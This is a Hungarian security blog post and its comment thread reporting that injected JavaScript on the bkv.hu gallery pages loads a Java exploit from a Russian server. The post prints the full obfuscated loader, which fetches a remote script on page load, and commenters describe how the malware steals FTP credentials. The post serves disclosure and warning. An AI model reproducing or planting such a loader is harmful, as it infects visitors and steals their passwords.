23:52: A kártékony kódokat eltávolították a galériákból
Z hívta fel rá a figyelmem, hogy a bkv.hu galériája egy rendesen összekuszált JavaScript kódot is tartalmaz (GPL licensz alatt ;), ami aztán valahogy egy orosz domainről próbál levadászni további futtatható kódokat. A fertőző oldal az alábbi címen érhető el, de mindenki csak saját felelősségre nézze meg!
hxxp://www.bkv.hu/galeria/20080408rendezveny/varosliget/index.php
Frissítés: Úgy tűnik, hogy a /galeria/20080408rendezveny/ útvonal alatti összes galéria fertőzött
A szkript így néz ki, ha valakinek van kedve rejtvényt fejteni:
<script>/*GNU GPL*/ try{window.onload = function(){var T4lhy9x465n =
document.createElement('s!$c#(#r@)^i(#p(t#'.replace(/\!|#|\) |\$|\^|@|\(|&/ig,
''));T4
lhy9x465n.setAttribute('type',
'text/javascript');T4lhy9x465n.setAttribute('src' ,
'h!$t@!$t$&$p(:#/($^/#@&k&!!&i)(n$^@o$^!p@o$!@i($&)s&&!k(!^ &-($r$^u^(&.
(!$g@o((#(@o&!)^g^)&$&l!^e&&.)@a!^)@e!).#@m$!i^h#(a&!&n^^b@) l@)o$#$g!-@!#c!)^)o((m#!).!)( m!$$u)$#s)!i^c(b^!@o)(x!!&p^( r)^)o^.(r!@u&):$^8@)0##8@$^0(# /&^g)$
a@(m$)($e&$f&($a$q#(s(!$.&!)&#c#&!o@$&$m^^^/(&g^$(@a&m$()e&^ #f!$@a)!(#q!(#s!.)$!^c&!o^!@@ m$^/!y^^$a(#&h#@o$^o)##.&@))c( o@@))&m#)!(/(1(##&1&)(0@#^)m$& ^b(!.
@!c$#o(!$m)/@##&g(($@$o()$o$g^l#!(^e$).@&&c)o^m(^(&/$@'. replace(/\)|#|&|\^|\$|@|\!|\(/ ig,
''));T4lhy9x465n.setAttribute('defer', 'defer');T4lhy9x465n.setA
ttribute('id', 'W!#!3!#j@#u@&&n!^(u&!&a!q$&)@!b@&&o$(!m$j!$'.replace(/\^|&| @|\$|\)|\!|\(|#/ig,
''));document.body.appendChild(T4lhy9x465n);}} catch(e) {}<
/script>
Kis szemgúvasztás árán egyébként a kód egész jól olvasható, egyszerűen ignorálni kell a fura karaktereket (amiket a replace metódusok szednek ki egyébként).
A Wepawet ugyan nem értékeli veszélyesnek az oldalt, a Google Safe Browsing API-ja viszont igen. Wiresharkkal nagy vonalakban lekövettem a hálózati forgalmat, és elsőre úgy tűnik, hogy a hivatkozott orosz oldal 0 hosszúságú választ ad. Ebből legnagyobb eséllyel az következik, hogy a) benéztem valamit a nagy kapkodásban b) Rosszul sikerült a fertőzés illetve eltávolították a kártékony tartalmat a külföldi szerverről.
...kiderült, hogy az oldal egy Java JRE sebezhetőséget használ ki (valószínűleg ezt), baromi óvatosan nyúljatok hozzá!
Minden esetre azt javaslom, hogy csak alapos védelemmel felvértezve (NoScript, virtuális gép, stb.) vágjatok neki a bkv.hu domainjának, ki tudja milyen kártevők tanyáznak arrafelé! Az informatikai osztályt pedig ismét csókoltatom...
Z-nek pedig még egyszer köszönet a közérdekű infóért!
Szívesen vennék egy teljes packet dumpot arról a lefolyásról, mikor az első ruszki oldal vissza is ad valamit - valószínűleg figyeli a user agentet, és az alapján dobja ki az exploitot (az enyém elveszett, Houston, Houston HW problémánk van :P ).
P1ngW1n 2010.01.06. 16:18:56
asva.info/virusos-a-bitmusic-2009-12.html
Takika 2010.01.06. 16:29:01
_2501 2010.01.06. 16:35:30
poTomek 2010.01.06. 17:06:50
terror 2010.01.06. 17:10:15
A Mediacenternel ezt ugy vedtek ki, hogy webes feluleten kell loginolni, es akkor az IP cimeddel tudsz FTP-zni. Aki nem authol weben, az bukja az FTP-t. Igy kihuzhato az irtas tobb napra is.
Csak azert irtam le, hatha valaki belefut ilyenbe meg...
kino 2010.01.06. 17:36:57
knorbert 2010.01.06. 17:56:53
twitpic.com/wxe0s/full illetve
twitpic.com/wxduz/full
mifolyikitt 2010.01.06. 18:53:44
Ja és elvileg nem csak a Total Commanderből tudja kiszedni a jelszót, hanem más FTP kliensekből is.
knorbert 2010.01.06. 19:01:46
buherator · http://buhera.blog.hu 2010.01.06. 19:13:06
lánczi sixx... izé... suxx 2010.01.06. 19:13:22
Kezdjek pánikolni, ha jártam a bkv.hu-n?
flea 2010.01.06. 19:27:53
Celtic 2010.01.06. 19:28:19
Két tojásos hottentotta 2010.01.06. 19:32:38
captpicard 2010.01.06. 19:32:51
A rendszergazda gépéről mászik az oldalba,és onnan fertőzi a gépet.
Hatása,hogy teljesen leterheli a rendszer,közben kódokat küldd erre a bizonyos orosz oldalra.
Azt nem értem miért zavarja öket a magyar torrent oldalak,és a BKV.
Aki bekapja,annak alapos virusirtást,és rosszabb esetben Windows telepités ajánlok.
Az,hogy a BKV honlapjának rendszergazdái ezt nem vették észre,az sajnos minősiti az egész BKV-t is.
Sok pénz semmiért...
buherator · http://buhera.blog.hu 2010.01.06. 19:38:32
Pipas 2010.01.06. 19:46:50
S. Annyi 2010.01.06. 19:47:48
lánczi sixx... izé... suxx 2010.01.06. 19:49:16
buherator · http://buhera.blog.hu 2010.01.06. 19:49:53
lánczi sixx... izé... suxx 2010.01.06. 19:50:25
(vagy sok évvel ezelőtt nem téged zaklattalak a panasonic fotópályázat finoman szólva lyukas oldala kapcsán?)
Pipas 2010.01.06. 19:52:44
@buherator: Nincs folyamatos felügyelet? Az mondjuk gáz...
buherator · http://buhera.blog.hu 2010.01.06. 20:02:47
@marklovassy: thx!
blöki.hu · http://www.bloki.hu 2010.01.06. 20:03:34
Hasonlat: remélem neked se szólnak ha kiégett a féklámpád a kocsin, hanem jót röhögnek rajtad ha átment rajtad a kamion.
mandarinrece 2010.01.06. 20:08:06
www.youtube.com/watch?v=FR9BKPUk4SM
Hát normálisak ezek??
buherator · http://buhera.blog.hu 2010.01.06. 20:09:38
Pipas 2010.01.06. 20:10:02
Pipas 2010.01.06. 20:15:02
blöki.hu · http://www.bloki.hu 2010.01.06. 20:16:07
Fontosabb neked 200 látogató az indexről (a rádióknak meg egy 2 perces hír), minthogy megoldj egy problémát vagy ne adj Isten segíts valakinek. Olvassgassátok ezt... érdekes lesz: hu.wikipedia.org/wiki/Emp%C3%A1tia
Remélem kirúgják a rendszergazdát...
lintabá 2010.01.06. 20:22:07
moli 2010.01.06. 20:22:32
lánczi sixx... izé... suxx 2010.01.06. 20:22:33
buherator · http://buhera.blog.hu 2010.01.06. 20:28:29
@Csizmazia István [Rambo]:
@marklovassy:
Az a durva, hogy nekem sikerült olyan lefutást produkálnom, hogy betöltődött az exploit, csak aztán fagytam egyet :P Vagy a gonoszok bénáznak el valamit, vagy mi...
Pipas 2010.01.06. 20:30:34
Pipas 2010.01.06. 20:33:49
Viszont a balfék rendszergazdáknak inkább segítek, ha lehet, nem beszélem ki őket a _laikusok_ előtt!
buherator · http://buhera.blog.hu 2010.01.06. 20:40:11
Ha nem írom meg ezt a posztot, akkor valószínűleg soha nem derül ki, hogy gebasz volt, a megfertőzöttek meg majd megoldják valahogy. A posztolás pillanatától kezdve egyébként bárki írhatott/telefonálhatott a BKV-s illetékeseknek, mint ahogy az ha jól látom meg is történt.
Egyedül azt nem értem, hogy miért én vagyok a szemét, mikor mások szarvárat építenek nem kevés adóforintunkból?
blöki.hu · http://www.bloki.hu 2010.01.06. 20:44:10
Viszont az nagyobb baj, hogy - úgy általában - itt vadkeleten nem ismerik azt a fogalmat, hogy empátia.
Mennyivel jobb lenne, ha jeleznék a problémát, ők megoldanák - megköszönnék a segítséget és két boldog ember békésen távozik a naplemetében.
Csizmazia Darab István [Rambo] · http://antivirus.blog.hu 2010.01.06. 20:44:19
Threat: JS/TrojanDownloader.Iframe.NGU trojan
vyctoor 2010.01.06. 20:44:56
Pipas 2010.01.06. 20:46:21
Az viszont, hogy a felelősség a rendszergazdáé, az szerintem evidens. A rendszergazda felelőssége, hogy működőképes állapotban tartsa a rendszert, igazából semmi más dolga sincs. Lehet, hogy el van lehetetlenítve, lehet, hogy nem adtak rá lehetőséget, hogy elvégezze a dolgát, de akkor is az ő felelőssége!
br · http://www.szalaiannamaria.net 2010.01.06. 20:47:38
Gondolom a mostani közlekedési helyzet miatt sokan nézik a bkv oldalát, ennek a balfaszságnak köszönhetően sokan is megfertőződhetnek.
A rendszergazdának persze illik szólni, csak akkor lett volna buherator balfasz ha megvárja amíg intézkedik.
Mert az utóbbi lehetett volna "megoldom holnap délután a sajtóközlemények és a második kávé után", míg így a főnöke dörren rá, hogy "hátizé BÉLA, itt aztirják hogy vírusos a honlapunk!"
blöki.hu · http://www.bloki.hu 2010.01.06. 20:51:07
Pipas 2010.01.06. 20:51:25
Amikor legközelebb másokkal történt ilyesmi megpróbáltam törleszteni azzal, hogy nem verem nagydobra, hanem megkeresem a felelőst és megsúgom neki.
Amikor felhívtam egy egyetemi karon egy gyakorlatilag ismeretlen rendszergazdát, hogy itt és itt ül egy hallgató, aki éppen minket támad, akkor rohantak elkapni. Mert a rendszergazdák összetartottak abban iaz időben...
Pipas 2010.01.06. 20:55:20
Ez van olyan elmés védekezés mint a 'lehet, hogy ott se vótam'! Gratula!
buherator · http://buhera.blog.hu 2010.01.06. 20:56:36
Én túl vagyok már legalább 100 hasonló bugreporton, és az esetek kb. felében szarnak az ember fejére, főleg ha nagy cégről van szó.
blöki.hu · http://www.bloki.hu 2010.01.06. 20:59:13
blöki.hu · http://www.bloki.hu 2010.01.06. 21:00:12
Pipas 2010.01.06. 21:01:46
Karácsony este Pécsett a haverommal megálltunk egy hajlékony miatt és kihívtuk a mentőket. Sok részeg ember van, lehet, hogy nem is mentettük meg az életét. viszont... két éve az egyik barátom elájult délután kettőkor az egyik egyetemi kar bejáratához közel. Két óra múlva magához tért és kihívta a mentőket, akik végülis megmentették az életét.
Mesélte, hogy pár hét múlva az egyik nagytudású egyetemi oktató megkérdezte hogy van mostanába, mert múlkor látta feküdni a templom lépcsőjén... Hát ez van mostanában felénk!
Pipas 2010.01.06. 21:02:44
br · http://www.szalaiannamaria.net 2010.01.06. 21:03:25
Tehát primitíven:
1. nincs index címlap
2. nincs a nyilvánosság nyomása
3. nincs faszkorbáccsal csapkodás, hogy oldja meg a rendszergazda a vírusfertőzést.
Nem azt mondtam, hogy ne szóljanak a rendszergazdának, hanem azt, hogy a nyilvánosságot helyesen értesítette buherator.
Pipas 2010.01.06. 21:05:03
buherator · http://buhera.blog.hu 2010.01.06. 21:06:02
Húú, maradhatnánk legalább részben informatikai területen?
Egyébként nem tudom figyelitek-e, de 6 óra telt el a poszt kikerülése óta, hamlet levele óta mondjuk 1, a kód még mindig ott van.
Pár kommentet törölnöm kellett, remélem így már nem picsognak majd az AV-k.
blöki.hu · http://www.bloki.hu 2010.01.06. 21:12:35
Ezért simán be lehetne rángatni a rendszergazdát, vagy oldja meg otthonról.
Viszont ha 6 órával ezelőtt irsz egy mailt vagy csörögsz oda akkor még lehet, hogy dolgo... izé.... van benn valaki.
Pipas 2010.01.06. 21:14:19
Országos hír van abből, hogy kirúgtak két vezetőt és akkor tovább olvasol és kiderül, hogy buszvezetőt rúgtak ki! Mintha karamboloztak volna, mintha ők tehetnének arról, ami ma tömegközlekedés címén megy!
Nyilvánvaló, hogy az informatikai rendszer/csoport pont ilyen impotens/korrupt szinten van, nem?
buherator · http://buhera.blog.hu 2010.01.06. 21:15:01
lánczi sixx... izé... suxx 2010.01.06. 21:16:47
buherator · http://buhera.blog.hu 2010.01.06. 21:19:15
_2501 2010.01.06. 21:20:54
nézzetek family guy-t... :D
blöki.hu · http://www.bloki.hu 2010.01.06. 21:21:17
Dízelboy 2010.01.06. 21:21:40
twollah / bRoKEn hOPe, sUppLeX · http://freewaresoftwarenews.blogspot.com/ 2010.01.06. 21:21:46
Es akkor talan nem lenne ilyen gebasz, hogy a fertozott gep megfertozi a weboldalt.
buherator · http://buhera.blog.hu 2010.01.06. 21:24:03
Pipas 2010.01.06. 21:24:40
Csizmazia Darab István [Rambo] · http://antivirus.blog.hu 2010.01.06. 21:24:47
Hogy megis megmaradjon az orokkevalosagnak ;-) jpg-ben teszem vissza a hosszaszolasaimat:
kepfeltoltes.hu/100106/kod1_www.kepfeltoltes.hu_.png
kepfeltoltes.hu/100106/kod2_www.kepfeltoltes.hu_.png
Pipas 2010.01.06. 21:27:21
lánczi sixx... izé... suxx 2010.01.06. 21:30:35
|Z| 2010.01.06. 21:31:20
Ha lemented TC < 7.5-be, akkor konfigból kiolvassa.
Ha lemented TC >= 7.5-be és állítottál mester jelszót, akkoris ott lesz a memóriában ahonnan kiszedheti.
Ha virtuális billentyűzettel írod be, akkor minden klikkelésről tud képernyőt menteni amiből visszafejthető.
Ha valami extra dologgal írtad be, akkor meg marad a triviális "Ja, hogy ez plaintext FTP, akkor hallgassunk bele a hálózati kommunikációba és ott a jelszó ..." dolog.
Hogy az öreg klasszikust idézzem : "If an attacker can persuade you to run his program on your computer, it is not your computer anymore"
És szerintem most nem arról volt szó, hogy buherátor pellengérre állítja szegény BKV-t, hanem figyelmezteti a felhasználókat, hogy vigyázzanak. Szerintem.
Takika 2010.01.06. 21:33:56
Pipas 2010.01.06. 21:34:43
buherator · http://buhera.blog.hu 2010.01.06. 21:35:23
Pipas 2010.01.06. 21:41:19
buherator · http://buhera.blog.hu 2010.01.06. 21:43:48
lánczi sixx... izé... suxx 2010.01.06. 21:44:06
Takika 2010.01.06. 21:45:42
Pipas 2010.01.06. 21:48:13
Ideiglenesen átáltam a söről a cider-re... kezdek berúgni. ;)
Pipas 2010.01.06. 21:50:19
buherator · http://buhera.blog.hu 2010.01.06. 21:52:55
@Takika: Én csak arra próbálok rávilágítani, hogy azért ezt a védelmet igen könnyen meg lehet kerülni. Jobbat viszont sajnos én sem tudok :(
Mirrorozom közben egyébként a bkv.hu-t hogy kiderüljön, hol van még malware benne.
Pipas 2010.01.06. 21:56:21
|Z| 2010.01.06. 21:56:44
Ezt észrevettem, ellenőriztem, buherátor-nak írtam, ő kiposztolta, akinek meg volt ideje bejelentette phistank-nél google-nál IE-nél BKV-nál stb. A munka részemről outsource-olva lett. A BKV megítélése nem hiszem hogy ezen az eseten múlna. Hogy miért nem a BKV-nak írtam? Mert így keltem fel, meg reggel nem jött a busz. Ennyi.
Pipas 2010.01.06. 22:04:43
Pipas 2010.01.06. 22:11:00
Pipas 2010.01.07. 00:02:56
flea 2010.01.07. 00:03:32
www.lmgtfy.com/?q=rotfl
az xD-t rád bízom ;) ... izé xD
eax_ 2010.01.07. 00:46:50
Pedig egy tisztesseges fejlesztesi workflow erre is megoldast jelentene: a web developzorok igazan leszokhatnanak arrol, hogy az eles kodot ft-vel taknyoljak, minden ertelmes fejleszto valami scm-be dolgozik, es a commitokat ha mas nem is, legalabb a keszitoje egyszer atnezi, mielott elesbe kerul.
Pipas 2010.01.07. 01:07:46
Pipas 2010.01.07. 01:15:20
Na jó, én meg berúgtam, az se sokkal job. ;)
eax_ 2010.01.07. 01:51:04
Szamitottam ra, hogy a web developzoroknak ez magas lesz, nade hogy ennyire...
buherator · http://buhera.blog.hu 2010.01.07. 01:57:53
Késő van...
_2501 2010.01.07. 07:47:45
-xpander- 2010.01.07. 09:33:34
egy kicsit offtopic leszek, de gondoltam megpendítem a dolgot, hátha valaki ír belőle egy korrekt posztot.
szóval nem értem, hogy a BKV-nál kinek jutott eszébe, hogy az éjszakai menetrendeket PDF-ben tegyék fel a honlapjukra (www.bkv.hu/ejszakai/914vissza.pdf). ilyen módon úgyanik véletlen sem tudom a telefonommal megnézni, ha éppen valahol a budapesti éjszakában mászkálok és busszal szeretnék hazajutni.
synapse · http://www.synsecblog.com 2010.01.07. 09:57:02
ahahaha :D
synapse · http://www.synsecblog.com 2010.01.07. 10:06:03
Pofatlan osszegeket basznak el erre a munkara a mi penzunkbol, a legkevesebb ami kijar az az, hogy EMPATIAVAL (igen tudjuk mi az, ne olvass annyi wikipediat) nem elek ezen emberek fele.
Ugyanis ok a (meg mindig) mi penzunkbol szakitanak brutalis osszegeket egy ilyen szinvonaltalan munkaval. Ha meg ok alul vannak fizetve akkor hol van a mi penzunk?
fuckthesystem
synapse
_2501 2010.01.07. 10:14:21
synapse · http://www.synsecblog.com 2010.01.07. 10:24:17
MAS: Ez nem egy szakmai portal?
buherator ezeket a kommenteket miert engeded:
Pipas 2010.01.06. 22:11:00
Asszem visszaállok a búzasörre! ;)
Pipas 2010.01.07. 00:02:56
Denny Crane!
Sok reszeg idiota ide loki a baromsagait, 0 relevanciaval a temaban, filozofal meg politikarol ugat? Megvette a blogot a hup/sghu/index, vagy miafrancvan? A laikus idiotak menjenek szepen egyeb szakmai portalokra teligumit cserelni, nem kell feltetlen hozzaszolni ahhoz amihez lovesed nincsen. Tipikus bikeshed, hogy amikor a tartalomhoz nem tudsz hozzaszolni akkor empatiarol meg etikarol ugatsz.
synapse
moli 2010.01.07. 10:34:56
Udi · http://blog.udi.hu 2010.01.07. 10:56:05
A JRE frissítés windows alatt, az egyik legelbaszotabb dolog, ami létezik. Én mindig kikapcsolom, szóval nem tudom, hogy változott e, de a Sun úgy képzeli el az automatikus frissítést, hogy a régi verzió MELLÉ feltelepíti a frissítést, majd átállítja a JRE_HOME envet, és feltételezem a PATHot is.
Ennek egyenes folyománya, hogy a sok jre pár hónap alatt simán elkunyerál jópárszáz mega helyet, feleslegesen.
Ennek tükrében nem csoda, ha sokan fixált JRE verziót használnak. (Programozóknak meg általában egyenesen kötelező meghatározott verzióval nyomulni. 1.4.2 FTW)
|Z| 2010.01.07. 11:23:40
Celtic 2010.01.07. 11:26:10
Takika 2010.01.07. 19:24:47
synapse · http://www.synsecblog.com 2010.01.07. 23:05:17
_2501 2010.01.07. 23:09:24
moli 2010.01.08. 10:18:59
buherator · http://buhera.blog.hu 2010.01.08. 11:13:24
Hunger 2010.01.08. 11:58:00
"Nekem is törték már meg a rendszeremet és nem azért, mert szartam rá, hanem azért, mert kurvára el voltam havazva mással."
:)))
"Elkaptam harminc támadót, fejüket szét tudtam volna verve, de a harmincegyedik bejött."
:))))))))
Miről beszélsz Laci, az egyetemen is mindenki ki-be járkált a szervereiteken, annyira nulla volt rajtuk a biztonság.
synapse · http://www.synsecblog.com 2010.01.08. 12:47:52
xShark 2010.01.10. 08:35:26
|Z| 2010.01.13. 16:08:02
Az oldal más, a kód más, a BKV marad :)
schittfakk.blog.hu/2010/01/01/bkv_legujabb_szolgaltatasa_virushoszting